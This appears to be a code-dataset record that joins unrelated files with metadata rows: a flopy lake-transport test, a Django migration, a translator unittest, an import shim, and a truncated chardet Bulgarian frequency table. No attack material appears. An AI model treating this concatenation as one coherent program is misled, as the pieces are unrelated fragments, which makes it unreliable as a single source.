0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
lkarr1 = np.array(lkarr1)
lkarr2 = np.array(lkarr2)
lkarr1 = lkarr1.reshape(top1.shape)
lkarr2 = lkarr2.reshape(top1.shape)
lkarr3 = np.zeros(top1.shape)
lkarr = [lkarr1, lkarr2, lkarr3]
lkarr = np.array(lkarr)
bdlk1 = np.zeros(top1.shape)
bdlk2 = np.zeros(top1.shape)
bdlk3 = np.zeros(top1.shape)
bdlk1[bdlk1==1] = 1e-8
bdlk1[bdlk1==2] = 2e-8
bdlk1[bdlk1==3] = 1.5e-8
bdlk2[bdlk2==1] = 1e-8
bdlk2[bdlk2==2] = 2e-8
bdlk2[bdlk2==3] = 1.5e-8
bdlk = [bdlk1, bdlk2, bdlk3]
bdlknc = np.array(bdlk)
nlakes = int(np.max(lkarr))
ipakcb = 3 # From above
theta = -1. # Implicit
nssitr = 99 # Maximum number of iterations for Newtons method
sscncr = 1.000e-02 # Convergence criterion for equilibrium lake stage solution
surfdep = 2.000e-01 # Height of small topological variations in lake-bottom
stages = [200.0, 200.0, 200.0]
stage_range = [(160.0, 220.0),
(170.0, 220.0),
(180.0, 220.0)] # Initial stage of each lake at the beginning of the run
flux_data = {0: [[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0]]}
lak = flopy.modflow.ModflowLak(mf, nlakes=nlakes, ipakcb=ipakcb, theta=theta,
nssitr=nssitr, sscncr=sscncr, surfdep=surfdep,
stages=stages, stage_range=stage_range, lakarr=lkarr,
bdlknc=bdlknc, flux_data=flux_data, unit_number=16)
## Instantiate linkage with mass transport routing (LMT) package for MODFLOW-NWT (generates linker file)
lmt = flopy.modflow.ModflowLmt(mf, output_file_name='lkttest.ftl', output_file_header='extended',
output_file_format='formatted', package_flows = ['lak'])
## Now work on MT3D-USGS file creation
mt = flopy.mt3d.Mt3dms(modflowmodel=mf, modelname=modelname, model_ws=modelpth,
version='mt3d-usgs', namefile_ext='mtnam', exe_name=mtexe,
ftlfilename='lkttest.ftl', ftlfree=True)
## Instantiate basic transport (BTN) package for MT3D-USGS
ncomp = 2
mcomp = 2
lunit = 'FT'
laycon = 1
sconc = 0.0
sconc2 = 0.0
prsity = 0.3
cinact = -1.0
thkmin = 0.01
nprs = -1
nprobs = 1
nprmas = 1
dt0 = 0.
nstp = 1
mxstrn = 50000
tsmult = 1
ttsmult = 1.
ttsmax = 0
perlen = 86400.
btn = flopy.mt3d.Mt3dBtn(mt, lunit=lunit, ncomp=ncomp, mcomp=mcomp,
sconc=sconc, prsity=prsity, cinact=cinact,
laycon=laycon, thkmin=thkmin, nprs=nprs, nprobs=nprobs,
chkmas=True,nprmas=nprmas, perlen=perlen, dt0=dt0,
nstp=nstp, tsmult=tsmult, mxstrn=mxstrn,
ttsmult=ttsmult, ttsmax=ttsmax, sconc2=sconc2)
## Instantiate advection (ADV) package for MT3D-USGS
mixelm = 0
percel = 0.7500
mxpart = 5000
nadvfd = 1 # (1 = Upstream weighting)
adv = flopy.mt3d.Mt3dAdv(mt, mixelm=mixelm, percel=percel, mxpart=mxpart,
nadvfd=nadvfd)
## Instantiate generalized conjugate gradient solver (GCG) package for MT3D-USGS
mxiter = 1
iter1 = 50
isolve = 1
ncrs = 0
accl = 1.000000
cclose = 1.00e-05
iprgcg = 0
gcg = flopy.mt3d.Mt3dGcg(mt, mxiter=mxiter, iter1=iter1,
isolve=isolve, ncrs=ncrs, accl=accl,
cclose=cclose, iprgcg=iprgcg)
## Instantiate source-sink mixing (SSM) package for MT3D-USGS
mxss = 0
ssm = flopy.mt3d.Mt3dSsm(mt, mxss=mxss)
## Instantiate LKT package
nlkinit = 3
mxlkbc = 12
icbclk = 0
ietlak = 0
coldlak = [2., 1., 6.]
coldlak2 = [3., 2., 7.] # Starting concentration for species 2
lkt_flux_data = {0: [[0, 1, 0.0, 0.0],
[1, 1, 0.0, 0.0],
[2, 1, 0.0, 0.0]]}
lkt = flopy.mt3d.Mt3dLkt(mt, nlkinit=nlkinit, mxlkbc=mxlkbc, icbclk=icbclk,
ietlak=ietlak, coldlak=coldlak,
lk_stress_period_data=lkt_flux_data, coldlak2=coldlak2)
mf.write_input()
mt.write_input()
# Make sure the just written files are loadable
namfile = modelname + '.nam'
mf = flopy.modflow.Modflow.load(namfile, model_ws=tpth,
version='mfnwt', verbose=True,
exe_name=mfnwt_exe)
namfile = modelname + '.mtnam'
mt = flopy.mt3d.mt.Mt3dms.load(namfile, model_ws=tpth, verbose=True,
version='mt3d-usgs', exe_name=mt3d_usgs_exe)
return
if __name__ == '__main__':
test_lkt_with_multispecies()
| 138.461279 | 542 | 0.455049 | 23,608 | 82,246 | 1.582938 | 0.021772 | 0.450308 | 0.651699 | 0.838534 | 0.848301 | 0.844207 | 0.843805 | 0.840541 | 0.835617 | 0.835617 | 0 | 0.509963 | 0.259842 | 82,246 | 593 | 543 | 138.694772 | 0.103918 | 0.022725 | 0 | 0.403614 | 0 | 0 | 0.001768 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.002008 | false | 0 | 0.01004 | 0 | 0.014056 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
9bfe89021494e44c9dc9b06f7c0351665c7a3990 | 1,295 | py | Python | api/barriers/migrations/0064_auto_20200623_1522.py | cad106uk/market-access-api | a357c33bbec93408b193e598a5628634126e9e99 | [
"MIT"
] | null | null | null | api/barriers/migrations/0064_auto_20200623_1522.py | cad106uk/market-access-api | a357c33bbec93408b193e598a5628634126e9e99 | [
"MIT"
] | null | null | null | api/barriers/migrations/0064_auto_20200623_1522.py | cad106uk/market-access-api | a357c33bbec93408b193e598a5628634126e9e99 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.12 on 2020-06-23 15:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('barriers', '0063_auto_20200428_1008'),
]
operations = [
migrations.AddField(
model_name='barrierinstance',
name='public_eligibility',
field=models.BooleanField(default=None, help_text='Mark the barrier as either publishable or unpublishable to the public.', null=True),
),
migrations.AddField(
model_name='barrierinstance',
name='public_eligibility_summary',
field=models.TextField(default=None, help_text='Public eligibility summary if provided by user.', null=True),
),
migrations.AddField(
model_name='historicalbarrierinstance',
name='public_eligibility',
field=models.BooleanField(default=None, help_text='Mark the barrier as either publishable or unpublishable to the public.', null=True),
),
migrations.AddField(
model_name='historicalbarrierinstance',
name='public_eligibility_summary',
field=models.TextField(default=None, help_text='Public eligibility summary if provided by user.', null=True),
),
]
| 38.088235 | 147 | 0.654054 | 135 | 1,295 | 6.148148 | 0.4 | 0.122892 | 0.110843 | 0.13012 | 0.816867 | 0.816867 | 0.816867 | 0.816867 | 0.748193 | 0.748193 | 0 | 0.032888 | 0.248649 | 1,295 | 33 | 148 | 39.242424 | 0.820144 | 0.035521 | 0 | 0.740741 | 1 | 0 | 0.347233 | 0.100241 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037037 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5006a05149a5a793fd64a2e84ccc6bde3f8607df | 1,216 | py | Python | final_project/machinetranslation/tests/tests.py | remiborredon/xzceb-flask_eng_fr | 3fa67bc0cbe88de9f9595fbf5b40178d8b45ef80 | [
"Apache-2.0"
] | null | null | null | final_project/machinetranslation/tests/tests.py | remiborredon/xzceb-flask_eng_fr | 3fa67bc0cbe88de9f9595fbf5b40178d8b45ef80 | [
"Apache-2.0"
] | null | null | null | final_project/machinetranslation/tests/tests.py | remiborredon/xzceb-flask_eng_fr | 3fa67bc0cbe88de9f9595fbf5b40178d8b45ef80 | [
"Apache-2.0"
] | null | null | null | import unittest
import translator
class TestFr2EnMethod(unittest.TestCase):
def test_translateBonjour(self):
frenchText = 'Bonjour'
transatedText = translator.french_to_english(frenchText)
self.assertEquals(transatedText, "Hello")
def test_translateHello(self):
frenchText = 'Hello'
transatedText = translator.french_to_english(frenchText)
self.assertEquals(transatedText, "Hello")
def test_translateNull(self):
frenchText = ''
with self.assertRaises(Exception):
translator.french_to_english(frenchText)
class TestEn2FrMethod(unittest.TestCase):
def test_translateBonjour(self):
frenchText = 'Bonjour'
transatedText = translator.english_to_french(frenchText)
self.assertEquals(transatedText, "Bonjour")
def test_translateHello(self):
frenchText = 'Hello'
transatedText = translator.english_to_french(frenchText)
self.assertEquals(transatedText, "Bonjour")
def test_translateNull(self):
frenchText = ''
with self.assertRaises(Exception):
translator.english_to_french(frenchText)
if __name__ == '__main__':
unittest.main() | 32 | 64 | 0.695724 | 109 | 1,216 | 7.522936 | 0.247706 | 0.05122 | 0.126829 | 0.190244 | 0.887805 | 0.826829 | 0.826829 | 0.826829 | 0.746341 | 0.746341 | 0 | 0.002101 | 0.217105 | 1,216 | 38 | 65 | 32 | 0.859244 | 0 | 0 | 0.733333 | 0 | 0 | 0.046015 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | false | 0 | 0.066667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ac9ca6d48636eab469bb15e16756e584d47ddfe3 | 171 | py | Python | kayako_exporter/compat.py | Eksmo/kayako-exporter | 69b2da804600de8dee925e8f3c5d94afc9a3e646 | [
"BSD-2-Clause"
] | 1 | 2021-02-02T11:58:27.000Z | 2021-02-02T11:58:27.000Z | kayako_exporter/compat.py | MyBook/kayako-exporter | 69b2da804600de8dee925e8f3c5d94afc9a3e646 | [
"BSD-2-Clause"
] | null | null | null | kayako_exporter/compat.py | MyBook/kayako-exporter | 69b2da804600de8dee925e8f3c5d94afc9a3e646 | [
"BSD-2-Clause"
] | null | null | null | # coding: utf-8
try:
from http.server import HTTPServer, BaseHTTPRequestHandler
except ImportError:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
| 24.428571 | 65 | 0.807018 | 17 | 171 | 8.117647 | 0.764706 | 0.231884 | 0.550725 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006849 | 0.146199 | 171 | 6 | 66 | 28.5 | 0.938356 | 0.076023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
acc312b5a9bb3d7430015561ee95a67e8460cafe | 12,686 | py | Python | venv/lib/python3.8/site-packages/pip/_vendor/chardet/langbulgarianmodel.py | realxwx/leetcode-solve | 3a7d7d8e92a5fd5fecc347d141a1c532b92e763e | [
"Apache-2.0"
] | null | null | null | venv/lib/python3.8/site-packages/pip/_vendor/chardet/langbulgarianmodel.py | realxwx/leetcode-solve | 3a7d7d8e92a5fd5fecc347d141a1c532b92e763e | [
"Apache-2.0"
] | null | null | null | venv/lib/python3.8/site-packages/pip/_vendor/chardet/langbulgarianmodel.py | realxwx/leetcode-solve | 3a7d7d8e92a5fd5fecc347d141a1c532b92e763e | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2020
# Author: xiaoweixiang
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# Character Mapping Table:
# this table is modified base on win1251BulgarianCharToOrderMap, so
# only number <64 is sure valid
Latin5_BulgarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253, 77, 90, 99,100, 72,109,107,101, 79,185, 81,102, 76, 94, 82, # 40
110,186,108, 91, 74,119, 84, 96,111,187,115,253,253,253,253,253, # 50
253, 65, 69, 70, 66, 63, 68,112,103, 92,194,104, 95, 86, 87, 71, # 60
116,195, 85, 93, 97,113,196,197,198,199,200,253,253,253,253,253, # 70
194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209, # 80
210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225, # 90
81,226,227,228,229,230,105,231,232,233,234,235,236, 45,237,238, # a0
31, 32, 35, 43, 37, 44, 55, 47, 40, 59, 33, 46, 38, 36, 41, 30, # b0
39, 28, 34, 51, 48, 49, 53, 50, 54, 57, 61,239, 67,240, 60, 56, # c0
1, 18, 9, 20, 11, 3, 23, 15, 2, 26, 12, 10, 14, 6, 4, 13, # d0
7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,241, 42, 16, # e0
62,242,243,244, 58,245, 98,246,247,248,249,250,251, 91,252,253, # f0
)
win1251BulgarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253, 77, 90, 99,100, 72,109,107,101, 79,185, 81,102, 76, 94, 82, # 40
110,186,108, 91, 74,119, 84, 96,111,187,115,253,253,253,253,253, # 50
253, 65, 69, 70, 66, 63, 68,112,103, 92,194,104, 95, 86, 87, 71, # 60
116,195, 85, 93, 97,113,196,197,198,199,200,253,253,253,253,253, # 70
206,207,208,209,210,211,212,213,120,214,215,216,217,218,219,220, # 80
221, 78, 64, 83,121, 98,117,105,222,223,224,225,226,227,228,229, # 90
88,230,231,232,233,122, 89,106,234,235,236,237,238, 45,239,240, # a0
73, 80,118,114,241,242,243,244,245, 62, 58,246,247,248,249,250, # b0
31, 32, 35, 43, 37, 44, 55, 47, 40, 59, 33, 46, 38, 36, 41, 30, # c0
39, 28, 34, 51, 48, 49, 53, 50, 54, 57, 61,251, 67,252, 60, 56, # d0
1, 18, 9, 20, 11, 3, 23, 15, 2, 26, 12, 10, 14, 6, 4, 13, # e0
7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,253, 42, 16, # f0
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 96.9392%
# first 1024 sequences:3.0618%
# rest sequences: 0.2992%
# negative sequences: 0.0020%
BulgarianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,3,3,3,3,3,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,2,2,1,2,2,
3,1,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,0,1,
0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,3,3,0,3,1,0,
0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,2,3,3,3,3,3,3,3,3,0,3,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,1,3,2,3,3,3,3,3,3,3,3,0,3,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,2,3,2,2,1,3,3,3,3,2,2,2,1,1,2,0,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,2,3,2,2,3,3,1,1,2,3,3,2,3,3,3,3,2,1,2,0,2,0,3,0,0,
0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,1,3,3,3,3,3,2,3,2,3,3,3,3,3,2,3,3,1,3,0,3,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,1,3,3,2,3,3,3,1,3,3,2,3,2,2,2,0,0,2,0,2,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,3,3,1,2,2,3,2,1,1,2,0,2,0,0,0,0,
1,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,2,3,3,1,2,3,2,2,2,3,3,3,3,3,2,2,3,1,2,0,2,1,2,0,0,
0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,1,3,3,3,3,3,2,3,3,3,2,3,3,2,3,2,2,2,3,1,2,0,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,3,3,1,1,1,2,2,1,3,1,3,2,2,3,0,0,1,0,1,0,1,0,0,
0,0,0,1,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,2,2,3,2,2,3,1,2,1,1,1,2,3,1,3,1,2,2,0,1,1,1,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,1,3,2,2,3,3,1,2,3,1,1,3,3,3,3,1,2,2,1,1,1,0,2,0,2,0,1,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,2,2,3,3,3,2,2,1,1,2,0,2,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,0,1,2,1,3,3,2,3,3,3,3,3,2,3,2,1,0,3,1,2,1,2,1,2,3,2,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,1,1,2,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,1,3,3,2,3,3,2,2,2,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,0,3,3,3,3,3,2,1,1,2,1,3,3,0,3,1,1,1,1,3,2,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,2,2,2,3,3,3,3,3,3,3,3,3,3,3,1,1,3,1,3,3,2,3,2,2,2,3,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,2,3,3,2,2,3,2,1,1,1,1,1,3,1,3,1,1,0,0,0,1,0,0,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,2,3,2,0,3,2,0,3,0,2,0,0,2,1,3,1,0,0,1,0,0,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,2,1,1,1,1,2,1,1,2,1,1,1,2,2,1,2,1,1,1,0,1,1,0,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,2,1,3,1,1,2,1,3,2,1,1,0,1,2,3,2,1,1,1,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,2,2,1,0,1,0,0,1,0,0,0,2,1,0,3,0,0,1,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,2,3,2,3,3,1,3,2,1,1,1,2,1,1,2,1,3,0,1,0,0,0,1,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,1,2,2,3,3,2,3,2,2,2,3,1,2,2,1,1,2,1,1,2,2,0,1,1,0,1,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,1,3,1,0,2,2,1,3,2,1,0,0,2,0,2,0,1,0,0,0,0,0,0,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,1,2,0,2,3,1,2,3,2,0,1,3,1,2,1,1,1,0,0,1,0,0,2,2,2,3,
2,2,2,2,1,2,1,1,2,2,1,1,2,0,1,1,1,0,0,1,1,0,0,1,1,0,0,0,1,1,0,1,
3,3,3,3,3,2,1,2,2,1,2,0,2,0,1,0,1,2,1,2,1,1,0,0,0,1,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,2,3,3,1,1,3,1,0,3,2,1,0,0,0,1,2,0,2,0,1,0,0,0,1,0,1,2,1,2,2,
1,1,1,1,1,1,1,2,2,2,1,1,1,1,1,1,1,0,1,2,1,1,1,0,0,0,0,0,1,1,0,0,
3,1,0,1,0,2,3,2,2,2,3,2,2,2,2,2,1,0,2,1,2,1,1,1,0,1,2,1,2,2,2,1,
1,1,2,2,2,2,1,2,1,1,0,1,2,1,2,2,2,1,1,1,0,1,1,1,1,2,0,1,0,0,0,0,
2,3,2,3,3,0,0,2,1,0,2,1,0,0,0,0,2,3,0,2,0,0,0,0,0,1,0,0,2,0,1,2,
2,1,2,1,2,2,1,1,1,2,1,1,1,0,1,2,2,1,1,1,1,1,0,1,1,1,0,0,1,2,0,0,
3,3,2,2,3,0,2,3,1,1,2,0,0,0,1,0,0,2,0,2,0,0,0,1,0,1,0,1,2,0,2,2,
1,1,1,1,2,1,0,1,2,2,2,1,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,0,0,
2,3,2,3,3,0,0,3,0,1,1,0,1,0,0,0,2,2,1,2,0,0,0,0,0,0,0,0,2,0,1,2,
2,2,1,1,1,1,1,2,2,2,1,0,2,0,1,0,1,0,0,1,0,1,0,0,1,0,0,0,0,1,0,0,
3,3,3,3,2,2,2,2,2,0,2,1,1,1,1,2,1,2,1,1,0,2,0,1,0,1,0,0,2,0,1,2,
1,1,1,1,1,1,1,2,2,1,1,0,2,0,1,0,2,0,0,1,1,1,0,0,2,0,0,0,1,1,0,0,
2,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0,0,0,0,1,2,0,1,2,
2,2,2,1,1,2,1,1,2,2,2,1,2,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,1,1,0,0,
2,3,3,3,3,0,2,2,0,2,1,0,0,0,1,1,1,2,0,2,0,0,0,3,0,0,0,0,2,0,2,2,
1,1,1,2,1,2,1,1,2,2,2,1,2,0,1,1,1,0,1,1,1,1,0,2,1,0,0,0,1,1,0,0,
2,3,3,3,3,0,2,1,0,0,2,0,0,0,0,0,1,2,0,2,0,0,0,0,0,0,0,0,2,0,1,2,
1,1,1,2,1,1,1,1,2,2,2,0,1,0,1,1,1,0,0,1,1,1,0,0,1,0,0,0,0,1,0,0,
3,3,2,2,3,0,1,0,1,0,0,0,0,0,0,0,1,1,0,3,0,0,0,0,0,0,0,0,1,0,2,2,
1,1,1,1,1,2,1,1,2,2,1,2,2,1,0,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,0,0,
3,1,0,1,0,2,2,2,2,3,2,1,1,1,2,3,0,0,1,0,2,1,1,0,1,1,1,1,2,1,1,1,
